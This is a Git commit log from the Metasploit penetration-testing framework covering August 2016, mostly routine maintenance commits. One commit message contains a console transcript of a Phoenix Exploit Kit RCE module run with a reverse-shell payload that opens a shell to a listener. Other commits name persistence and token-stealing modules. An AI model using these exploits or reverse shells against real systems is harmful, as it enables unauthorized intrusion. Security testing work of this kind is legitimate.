Commit Graph

39552 Commits (7762f42dfab70079d33762979074ab8767e35155)

Author SHA1 Message Date
David Maloney b6dff719f3
add a hard require to the ssh mixin
added hard require for SSHFactory into the ssh exploit mixin
this should prevent any load-order bugs from cropping up again
2016-08-22 09:56:07 -05:00
Tim Wright 3955c4332d fix android autoload commands and sysinfo 2016-08-22 14:53:58 +01:00
h00die f2e2cb6a5e can't transfer file 2016-08-21 19:42:29 -04:00
h00die 6306fa5aa5 Per discussion in #7195, trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe) 2016-08-21 19:16:04 -04:00
Brandon Perry 2abf71a3ac Create zabbix_toggleids_sqli 2016-08-21 12:43:20 -05:00
Jay Turla 139d431230 eliminate space 2016-08-20 04:17:22 +08:00
dmohanty-r7 0c618cccef Use openvas-omp gem for crud operations
MS-1718
2016-08-19 15:14:32 -05:00
dmohanty-r7 4478136065 Unvendor openvas-omp gem
MS-1718
2016-08-19 15:14:32 -05:00
Jay Turla 51a2354fea Add KB for multi/http/caidao_php_backdoor_exec 2016-08-20 04:12:31 +08:00
Metasploit 87d34cfbba
Bump version of framework to 4.12.22 2016-08-19 10:02:28 -07:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
wchen-r7 265adebd50 Fix typo 2016-08-19 10:44:24 -05:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution
This module exploits a Remote Code Execution vulnerability in the web panel of Phoenix Exploit Kit via geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader, and then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
2016-08-19 21:29:55 +08:00
Rob Fuller 42462f03e2
Land #7219, ps -c listing of child processes
Awesome work by @wvu-r7 to help with identifying processes
started by the meterpreter session.
2016-08-19 00:27:06 -04:00
William Vu 3d4d7aae14 Add ps -c to show child processes of current shell 2016-08-18 19:23:21 -05:00
wchen-r7 0f4d26af19 Update yard doc 2016-08-18 17:18:16 -05:00
wchen-r7 2a61450511 Add new POST exploitation APIs for stealing a token 2016-08-18 17:08:21 -05:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
James Lee 91417e62a8
Cleanup docs 2016-08-18 10:40:32 -05:00
William Vu bc9a402d9e
Land #7214, print_brute ip:rport fix 2016-08-17 22:48:40 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 2fa4c7073b
Land #6995, SSH key persistence module 2016-08-17 22:44:57 -05:00
wchen-r7 e154aafaaa On Error Resume Next for zip.vbs 2016-08-17 17:08:38 -05:00
wchen-r7 60937ec5e9 If user is SYSTEM, then steal a token before decompression 2016-08-17 16:56:09 -05:00
William Webb 667c3566e5
Land #7209, Add functionality to pull .NET versions on Windows hosts 2016-08-17 12:48:05 -05:00
William Vu 4228868c29 Clean up after yourself
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00
Brent Cook b37dc8ea27
Land #7210, allow send_request_cgi to close a non-global socket 2016-08-16 22:54:23 -05:00
Brendan b25b2a5188 Cleaned up code per suggestions in the PR 2016-08-16 16:16:25 -05:00
wchen-r7 5f8ef6682a Fix #7202, Make print_brute print ip:rport if available
Fix #7202
2016-08-16 15:34:30 -05:00
Brendan bf77e14bef
Land #7212, Revert back win32/win64 platform string for Windows meterpreter 2016-08-16 11:26:13 -05:00
David Maloney 42b1ced4fb
remove *scan from gemspec bins
update the gemspec so that it doesn't try to build binstubs
for the *scan bins

MS-1691
2016-08-16 09:33:09 -05:00
Brent Cook 870669bdf7 handle exception in getsystem module 2016-08-15 23:51:05 -05:00
Brent Cook e70402a130 use the platform string verbatim on windows meterpreter 2016-08-15 23:50:57 -05:00
wchen-r7 498657ab35 Fix #3860, tearing down TCP connection for send_request_cgi
Fix #3860
2016-08-15 15:45:52 -05:00
Brendan 0778b77f7b Cleaned up a little 2016-08-15 12:20:28 -07:00
David Maloney 8bece28d00
remove *scan bins as well
all *scan bins need to be removed as the rex-bin_tools
gem will now handle these and put them in PATH

MS-1691
2016-08-15 14:04:00 -05:00
David Maloney d2a6c2e9ca
move rex bintools into new gem
move all the *scan *parsey code out into
the new rex-bin_tools gem

MS-1691
2016-08-15 14:01:43 -05:00
Brendan 7730e0eb27 Added ability to retrieve .NET versions 2016-08-15 11:29:00 -07:00
Brendan 906d480264 Added dotnet require 2016-08-15 11:06:29 -07:00
William Vu 8c70086170
Land #7204, typo fix
My favorite things to merge, @OJ. ;)
2016-08-15 01:47:30 -05:00
William Vu 2fed51bb18
Land #7115, Drupal CODER exploit 2016-08-15 01:15:23 -05:00
William Vu 62d28f10cb Clean up Mehmet modules 2016-08-15 01:12:58 -05:00
Vlatko Kosturjak 46e4ee4c5b Start using gem instead of obsolete library/tool
Rationale is as follows:
nessus-cli is obsolete
nessus is using json rest api instead of xmlrpc
xmlrpc name is therefore obsolete

Solution: with minimal changes start using nessus_rest gem.
2016-08-14 17:57:33 +02:00